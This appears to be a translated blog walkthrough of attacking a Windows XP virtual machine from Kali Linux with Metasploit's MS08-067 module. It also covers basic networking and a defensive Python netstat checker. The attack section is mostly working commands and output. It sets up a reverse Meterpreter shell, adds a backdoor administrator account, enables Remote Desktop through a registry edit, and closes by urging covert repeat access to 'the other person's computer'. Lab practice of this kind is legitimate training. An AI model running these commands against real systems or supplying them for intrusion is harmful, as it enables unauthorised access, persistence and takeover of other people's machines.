# Attacking Windows from Kali

Because I am a peace-loving person (stifled laugh), I created two systems inside a virtual machine, one Kali and one Windows XP, to run this intrusion experiment and so take my first step through the door into hacking.
#### Lab environment

#### Lab tools

Kali Linux (Baidu Baike): comes with many testing tools preinstalled, including nmap, Wireshark, John the Ripper and Aircrack-ng.[2] Users can run Kali Linux from a hard disk, a live CD or a live USB.

Metasploit (Baidu Baike): Metasploit is a free, downloadable framework through which one can easily obtain, develop and launch attacks against software vulnerabilities. It ships with hundreds of professional-grade exploit modules for known software vulnerabilities.
### Background knowledge

1.0 Familiarity with VMware. This lab runs inside VMware, so Kali Linux and Windows XP have to be installed and the virtual network designed; see the article [VMware 14.0 notes](http://www.jianshu.com/p/91c409b8ce79).

2.0 Computer networking basics.

**2.1 VMware virtual networks**

> Like a physical switch, a virtual switch connects networking components together. Virtual switches are also called virtual networks and are named VMnet0, VMnet1, VMnet2 and so on. A few virtual switches are mapped to specific networks by default.

Bridged networking: the virtual machine is connected to the network through a physical network adapter on the host system.

NAT networking: with NAT the virtual machine does not need its own IP address on the external network. A separate private network is set up on the host system.

Host-only networking: creates a network that is entirely contained within the host.
2.2 IP address classes (IPv4 here) and network types. An IP address is made of two parts, <net-id, host-id>. By the width of the network part, addresses are divided into classes A to E, and the class is read off the first octet: A (0-127), B (128-191), C (192-223); D (224-239) is multicast and E (240-255) is reserved.

3.0 The difference between VMware's bridged, NAT and host-only modes

This lab uses bridged networking for the virtual machines, so only bridged mode is described here.

bridged: in this mode the operating system that VMware virtualises behaves like an independent host on the LAN and can reach any machine on that network. Because it is an independent host, the guest needs its own IP address and subnet mask (either handed out by the same DHCP server that serves the physical LAN, or configured by hand). The relationship between a bridged guest and the host machine is that of two computers plugged into the same hub: for them to talk, the guest must have an IP address and subnet mask, and it must be in the same subnet as the host.

### Important details

1.0 **Because Kali is attacking Windows XP inside VMware, the two guests must be able to reach each other. The lab uses bridged networking, so the two guests behave as independent hosts, and hosts on a bridged network talk directly only if they are in the same subnet (same network number). Kali is set to 192.168.201.133 and Windows XP to 192.168.201.135; both are class C addresses, so under the default /24 mask the network number is the first three octets, 192.168.201, identical for both, and they can communicate. Verify it with `ping`.**

2.0 **For a clear result, turn off the Windows firewall. MS08-067 is delivered over SMB (TCP 445), which the XP SP2/SP3 firewall blocks inbound by default, so with the firewall on the exploit never reaches the vulnerable service. I also switched off the antivirus on my own physical host.**
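The classful rule and the "same subnet" test described above, written out as an added Python example (not part of the original post) so that any pair of addresses can be checked, not just the two in this lab. It uses only the standard library `ipaddress` module; the addresses in the `__main__` block are the lab's own.

```python
# Added example (not from the original post): classful IPv4 class, default
# mask, and a same-network test for two hosts.
import ipaddress

# Class boundaries by the value of the first octet: 0-127 A, 128-191 B,
# 192-223 C, 224-239 D (multicast), 240-255 E (reserved).
def ip_class(ip: str) -> str:
    first_octet = int(ipaddress.IPv4Address(ip)) >> 24
    if first_octet < 128:
        return "A"
    if first_octet < 192:
        return "B"
    if first_octet < 224:
        return "C"
    if first_octet < 240:
        return "D"
    return "E"

# Default (classful) masks; classes D and E have no host part, hence no mask.
CLASSFUL_MASK = {"A": "255.0.0.0", "B": "255.255.0.0", "C": "255.255.255.0"}

def classful_mask(ip: str) -> str:
    cls = ip_class(ip)
    if cls not in CLASSFUL_MASK:
        raise ValueError(f"{ip} is class {cls}: not a unicast host address")
    return CLASSFUL_MASK[cls]

def network_of(ip: str, mask: str = None) -> ipaddress.IPv4Network:
    """Network that `ip` belongs to under `mask` (classful default if omitted)."""
    mask = mask or classful_mask(ip)
    return ipaddress.IPv4Network(f"{ip}/{mask}", strict=False)

def can_talk_directly(a: str, b: str, mask: str = None) -> bool:
    """True when both hosts share one network, i.e. they are LAN neighbours
    (same hub/switch) rather than hosts that need a router between them."""
    return network_of(a, mask) == network_of(b, mask)

def describe(ip: str) -> str:
    addr = ipaddress.IPv4Address(ip)
    if addr.is_loopback:
        return f"{ip}: loopback, never leaves the host"
    return f"{ip}: class {ip_class(ip)}, network {network_of(ip)}"

if __name__ == "__main__":
    for ip in ("192.168.201.133", "192.168.201.135", "127.0.0.1"):
        print(describe(ip))
    # The two lab guests share 192.168.201.0/24 ...
    print(can_talk_directly("192.168.201.133", "192.168.201.135"))
    # ... whereas a host in 192.168.202.0/24 would need a router under /24,
    # but is a neighbour again under a /16 mask.
    print(can_talk_directly("192.168.201.133", "192.168.202.135"))
    print(can_talk_directly("192.168.201.133", "192.168.202.135", "255.255.0.0"))
```

The classful default is only the rule of thumb the text uses; in practice the mask actually configured on the interface (here 255.255.255.0, as `ifconfig` and `ipconfig` show later) is what decides whether two hosts are neighbours, which is why `network_of` accepts an explicit mask.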
### The intrusion begins

**1.0 Check the Linux IP address**

```
root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.201.133  netmask 255.255.255.0  broadcast 192.168.201.255
        inet6 fe80::20c:29ff:fecc:87cf  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:cc:87:cf  txqueuelen 1000  (Ethernet)
        RX packets 30  bytes 2530 (2.4 KiB)
        RX errors 0  dropped 5  overruns 0  frame 0
        TX packets 51  bytes 3303 (3.2 KiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 52  bytes 3756 (3.6 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 52  bytes 3756 (3.6 KiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0
```

> **Here you can see that my IP address is 192.168.201.133. To change it, use `ifconfig eth0 192.168.201.136` (the change is not persistent and is lost at reboot).** **127.0.0.1 is the [loopback address](https://baike.baidu.com/item/%E5%9B%9E%E9%80%81%E5%9C%B0%E5%9D%80): it refers to the local machine and is used mainly for testing. The whole 127.x.x.x range is loopback, an address internal to the [host](https://baike.baidu.com/item/%E4%B8%BB%E6%9C%BA)'s IP [stack](https://baike.baidu.com/item/%E5%A0%86%E6%A0%88), used for testing network software and for local [inter-process communication](https://baike.baidu.com/item/%E8%BF%9B%E7%A8%8B%E9%97%B4%E9%80%9A%E4%BF%A1). Whatever the program, data sent to a loopback address is handed straight back by the protocol stack and never goes onto the wire.**

**2.0 ping: test whether Linux and Windows can talk**

```
root@kali:~# ping -c 2 192.168.201.135
PING 192.168.201.135 (192.168.201.135) 56(84) bytes of data.
64 bytes from 192.168.201.135: icmp_seq=1 ttl=128 time=13.5 ms
64 bytes from 192.168.201.135: icmp_seq=2 ttl=128 time=0.395 ms

--- 192.168.201.135 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1002ms
rtt min/avg/max/mdev = 0.395/6.986/13.578/6.592 ms
```

The `ttl=128` in the replies is the Windows default (Linux uses 64), a quick hint that the responder really is a Windows box.

**Linux ping differs from Windows: without a count (`-c`) it keeps pinging until you interrupt it.** Running it with no arguments prints the usage:

```
root@kali:~# ping
Usage: ping [-aAbBdDfhLnOqrRUvV64] [-c count] [-i interval] [-I interface]
            [-m mark] [-M pmtudisc_option] [-l preload] [-p pattern] [-Q tos]
            [-s packetsize] [-S sndbuf] [-t ttl] [-T timestamp_option]
            [-w deadline] [-W timeout] [hop1 ...] destination
```
**3.0 Start the PostgreSQL database service** (Metasploit keeps hosts, services, credentials and sessions in it; on a fresh Kali install run `msfdb init` once first, then `db_status` inside msfconsole should report a connection)

```
root@kali:~# service postgresql start
```

**4.0 Run the `msfconsole` command in the terminal**

```
root@kali:~# msfconsole

 cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v4.16.6-dev                         ]
+ -- --=[ 1682 exploits - 964 auxiliary - 297 post       ]
+ -- --=[ 498 payloads - 40 encoders - 10 nops           ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > help

Core Commands

    Command       Description
    -------       -----------
    ?             Help menu
    banner        Display an awesome metasploit banner
    cd            Change the current working directory
    color         Toggle color
    connect       Communicate with a host
    exit          Exit the console
    get           Gets the value of a context-specific variable
    getg          Gets the value of a global variable
    grep          Grep the output of another command
    help          Help menu
    history       Show command history
    irb           Drop into irb scripting mode
    load          Load a framework plugin
    quit          Exit the console
    route         Route traffic through a session
    save          Saves the active datastores
    sessions      Dump session listings and display information about sessions
    set           Sets a context-specific variable to a value
    setg          Sets a global variable to a value
    sleep         Do nothing for the specified number of seconds
    spool         Write console output into a file as well the screen
    threads       View and manipulate background threads
    unload        Unload a framework plugin
    unset         Unsets one or more context-specific variables
    unsetg        Unsets one or more global variables
    version       Show the framework and console library version numbers

Module Commands

    Command       Description
    -------       -----------
    advanced      Displays advanced options for one or more modules
    back          Move back from the current context
    edit          Edit the current module with the preferred editor
    info          Displays information about one or more modules
    loadpath      Searches for and loads modules from a path
    options       Displays global options or for one or more modules
    popm          Pops the latest module off the stack and makes it active
    previous      Sets the previously loaded module as the current module
    pushm         Pushes the active or list of modules onto the module stack
    reload_all    Reloads all modules from all defined module paths
    search        Searches module names and descriptions
    show          Displays modules of a given type, or all modules
    use           Selects a module by name

Job Commands

    Command       Description
    -------       -----------
    handler       Start a payload handler as job
    jobs          Displays and manages jobs
    kill          Kill a job
    rename_job    Rename a job

Resource Script Commands

    Command       Description
    -------       -----------
    makerc        Save commands entered since start to a file
    resource      Run the commands stored in a file

Database Backend Commands

    Command           Description
    -------           -----------
    db_connect        Connect to an existing database
    db_disconnect     Disconnect from the current database instance
    db_export         Export a file containing the contents of the database
    db_import         Import a scan result file (filetype will be auto-detected)
    db_nmap           Executes nmap and records the output automatically
    db_rebuild_cache  Rebuilds the database-stored module cache
    db_status         Show the current database status
    hosts             List all hosts in the database
    loot              List all loot in the database
    notes             List all notes in the database
    services          List all services in the database
    vulns             List all vulnerabilities in the database
    workspace         Switch between database workspaces

Credentials Backend Commands

    Command       Description
    -------       -----------
    creds         List all credentials in the database
```

**5.0 Run `search netapi` to list every module in the Metasploit framework whose name or description mentions netapi**

```
msf > search netapi
```
```
Matching Modules

   Name                                 Disclosure Date  Rank    Description
   ----                                 ---------------  ----    -----------
   exploit/windows/smb/ms03_049_netapi  2003-11-11       good    MS03-049 Microsoft Workstation Service NetAddAlternateComputerName Overflow
   exploit/windows/smb/ms06_040_netapi  2006-08-08       good    MS06-040 Microsoft Server Service NetpwPathCanonicalize Overflow
   exploit/windows/smb/ms06_070_wkssvc  2006-11-14       manual  MS06-070 Microsoft Workstation Service NetpManageIPCConnect Overflow
   exploit/windows/smb/ms08_067_netapi  2008-10-28       great   MS08-067 Microsoft Server Service Relative Path Stack Corruption
```
> **The last module is ranked great (it is reliable and rarely crashes the target), so ms08_067_netapi is the one to use.** **`show targets` lists the target platforms.** **`show options` lists the parameters the attack needs.** **`show payloads` lists the payloads that can be used with this module.**

**6.0 `use exploit/windows/smb/ms08_067_netapi` and set the parameters**

```
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set rhost 192.168.201.135
rhost => 192.168.201.135
msf exploit(ms08_067_netapi) > check
[+] 192.168.201.135:445 The target is vulnerable.
msf exploit(ms08_067_netapi) > set lhost 192.168.201.133
lhost => 192.168.201.133
msf exploit(ms08_067_netapi) > set target 34
target => 34
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp_allports
payload => windows/meterpreter/reverse_tcp_allports
msf exploit(ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.201.133:1
[*] 192.168.201.135:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179267 bytes) to 192.168.201.135
[*] Meterpreter session 1 opened (192.168.201.133:1 -> 192.168.201.135:1031) at 2017-10-27 23:03:20 +0800
```
> **`set rhost` sets the target host's IP.** **`set lhost` sets the local (attacker) IP, the address the victim must connect back to.** **`set target 34` selects one entry from `show targets`; 0 is automatic targeting, and a specific index must match the victim's Windows version, service pack and language, because the return address differs per build and a wrong choice usually just crashes the Server service instead of returning a shell.** **`set payload` sets the payload; `reverse_tcp_allports` makes the victim try to connect back on every port starting from LPORT (default 1, hence the handler listening on 192.168.201.133:1), so it works even when you do not know which outbound ports the target is allowed.** **`check` asks the module to probe for the bug without exploiting it; `exploit` launches the attack and, if it succeeds, hands you a session in which Meterpreter can be used to go further.** Because the vulnerable Server service runs as LocalSystem, the session is NT AUTHORITY\SYSTEM (Meterpreter's `getuid` shows this), which is why creating a local administrator below needs no further privilege escalation.

**7.0 Type `shell` to get a shell on the compromised host; in my case that is the Windows command prompt.**

```
meterpreter > shell
Process 1968 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>net user ztg 123456 /add
net user ztg 123456 /add
The account already exists.

More help is available by typing NET HELPMSG 2224.


C:\WINDOWS\system32>net localgroup administrators ztg /add
net localgroup administrators ztg /add
System error 1378 has occurred.

The specified account name is already a member of the group.


C:\WINDOWS\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
The operation completed successfully.
```

The victim is a Chinese-locale XP, and its console messages came out as mojibake in the captured session (cmd.exe writes GBK and the output went through a UTF-8 terminal); they are shown above in their English form, identified by the error numbers. Note what they say: the account ztg already existed (NET error 2224) and was already in Administrators (system error 1378), because these commands had been run against this target before. On a clean target both `net` commands end with "The command completed successfully."; only the `REG ADD` reported success in this run.
```
C:\WINDOWS\system32>netstat -an
netstat -an

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1026         0.0.0.0:0              LISTENING
  TCP    192.168.201.135:139    0.0.0.0:0              LISTENING
  TCP    192.168.201.135:1031   192.168.201.133:1      ESTABLISHED
  UDP    0.0.0.0:445            *:*
  UDP    0.0.0.0:500            *:*
  UDP    0.0.0.0:4500           *:*
  UDP    127.0.0.1:123          *:*
  UDP    127.0.0.1:1025         *:*
  UDP    127.0.0.1:1900         *:*
  UDP    192.168.201.135:123    *:*
  UDP    192.168.201.135:137    *:*
  UDP    192.168.201.135:138    *:*
  UDP    192.168.201.135:1900   *:*
```

Two lines here are the footprint of what was just done: `0.0.0.0:3389 LISTENING` is Remote Desktop, now enabled by the registry change, and `192.168.201.135:1031 -> 192.168.201.133:1 ESTABLISHED` is the Meterpreter session itself (the victim's ephemeral port 1031 connected back to the handler on port 1).
```
C:\WINDOWS\system32>ipconfig -all
ipconfig -all

Windows IP Configuration

        Host Name . . . . . . . . . . . . : dflx
        Primary Dns Suffix  . . . . . . . :
        Node Type . . . . . . . . . . . . : Unknown
        IP Routing Enabled. . . . . . . . : No
        WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        Description . . . . . . . . . . . : VMware Accelerated AMD PCNet Adapter
        Physical Address. . . . . . . . . : 00-0C-29-04-23-53
        Dhcp Enabled. . . . . . . . . . . : No
        IP Address. . . . . . . . . . . . : 192.168.201.135
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . :
```

`Dhcp Enabled: No` with an empty default gateway confirms the XP guest was given its address by hand, as described under Important details.

> **Once you are on the Windows box, a command-line expert can do everything from here; if you prefer the Windows GUI, use the commands below to enable Remote Desktop and work through it instead.**

- `net user ztg 123456 /add` creates a local user named ztg with the password 123456.
- `net localgroup administrators ztg /add` puts ztg in the local Administrators group.
- `REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f` switches Remote Desktop on by hand: setting fDenyTSConnections to 0 makes the Terminal Server service accept connections on port 3389, which is why 3389 shows up as LISTENING in the netstat output above. The odd `Terminal" "Server` quoting is just a way of getting the space into the key path `Terminal Server` without quoting the whole argument. This only works on XP Professional; XP Home has no inbound Remote Desktop to enable.
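Seen from the defender's side, the changes above leave traces in exactly the kind of output the walkthrough printed: a 3389 listener that was not there before, and an established TCP connection from an ephemeral port to an unusual remote port (here port 1, the `reverse_tcp_allports` handler). The following is an added example, not code from the original post, that parses `netstat -an` text and reports those two indicators. The "after" text is the lab's own listing (shortened); the "before" baseline and the `EXPECTED_REMOTE_PORTS` allow-list are constructed assumptions to be tuned for a real environment.

```python
# Added example (not from the original post): spot the network-level traces
# of the session above in `netstat -an` output. NETSTAT_BEFORE is a constructed
# baseline; NETSTAT_AFTER is the lab's own listing, trimmed.
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

NETSTAT_BEFORE = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1026         0.0.0.0:0              LISTENING
  TCP    192.168.201.135:139    0.0.0.0:0              LISTENING
  UDP    0.0.0.0:445            *:*
  UDP    192.168.201.135:137    *:*
"""

NETSTAT_AFTER = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1026         0.0.0.0:0              LISTENING
  TCP    192.168.201.135:139    0.0.0.0:0              LISTENING
  TCP    192.168.201.135:1031   192.168.201.133:1      ESTABLISHED
  UDP    0.0.0.0:445            *:*
  UDP    192.168.201.135:137    *:*
"""

# Remote ports a workstation is normally expected to talk to (assumption;
# tune per environment). Any ESTABLISHED connection elsewhere is reported.
EXPECTED_REMOTE_PORTS = {53, 80, 88, 135, 139, 389, 443, 445, 636, 3268, 3389, 8080}

@dataclass(frozen=True)
class Conn:
    proto: str
    local_ip: str
    local_port: int
    remote_ip: Optional[str]     # None for UDP "*:*"
    remote_port: Optional[int]
    state: Optional[str]         # None for UDP rows

# Matches "TCP  1.2.3.4:445  0.0.0.0:0  LISTENING" and "UDP  1.2.3.4:137  *:*"
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+)(?:\s+(\S+))?\s*$")

def parse_netstat(text: str) -> List[Conn]:
    conns = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # header, blank line, or a row we do not understand
        proto, lip, lport, remote, state = m.groups()
        if remote == "*:*":
            rip, rport = None, None
        else:
            rip, rport_s = remote.rsplit(":", 1)
            rport = int(rport_s)
        conns.append(Conn(proto, lip, int(lport), rip, rport, state))
    return conns

Finding = Tuple[str, str, str, str]  # (kind, proto, local, remote)

def audit(after: str, before: str = "") -> List[Finding]:
    """Report listeners absent from the baseline and established connections
    to remote ports outside EXPECTED_REMOTE_PORTS. Without a baseline only the
    second check runs."""
    baseline = {(c.proto, c.local_port)
                for c in parse_netstat(before) if c.state == "LISTENING"}
    findings: List[Finding] = []
    for c in parse_netstat(after):
        local = f"{c.local_ip}:{c.local_port}"
        if c.state == "LISTENING" and before and (c.proto, c.local_port) not in baseline:
            findings.append(("new-listener", c.proto, local, ""))
        if c.state == "ESTABLISHED" and c.remote_port not in EXPECTED_REMOTE_PORTS:
            findings.append(("odd-outbound", c.proto, local, f"{c.remote_ip}:{c.remote_port}"))
    return findings

if __name__ == "__main__":
    for finding in audit(NETSTAT_AFTER, NETSTAT_BEFORE):
        print(finding)
```

The baseline diff is what catches the RDP change: 3389 is a perfectly normal listener on many Windows hosts, so it is only suspicious because it appeared between two snapshots. The port allow-list is what catches the session, and it is deliberately crude; a reverse shell to 443 would slip past it, which is the usual argument for pairing this kind of host check with process-to-socket mapping (`netstat -ano`) and egress logging on the network side.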
> ##### Now use Remote Desktop to log in to the other person's computer and do whatever you need there. One small detail: the administrator account you created will show up on the target machine, so you can log in remotely as often as you like, as long as the other side does not notice. **Anyone want to hack me? (stifled laugh) My IP: 127.0.0.1, the system is Windows 10 64-bit Home.**
> Sigh, I have not been running these past few days; this morning I finally went. I have had a cold the whole of October and still have it. Crying, crying.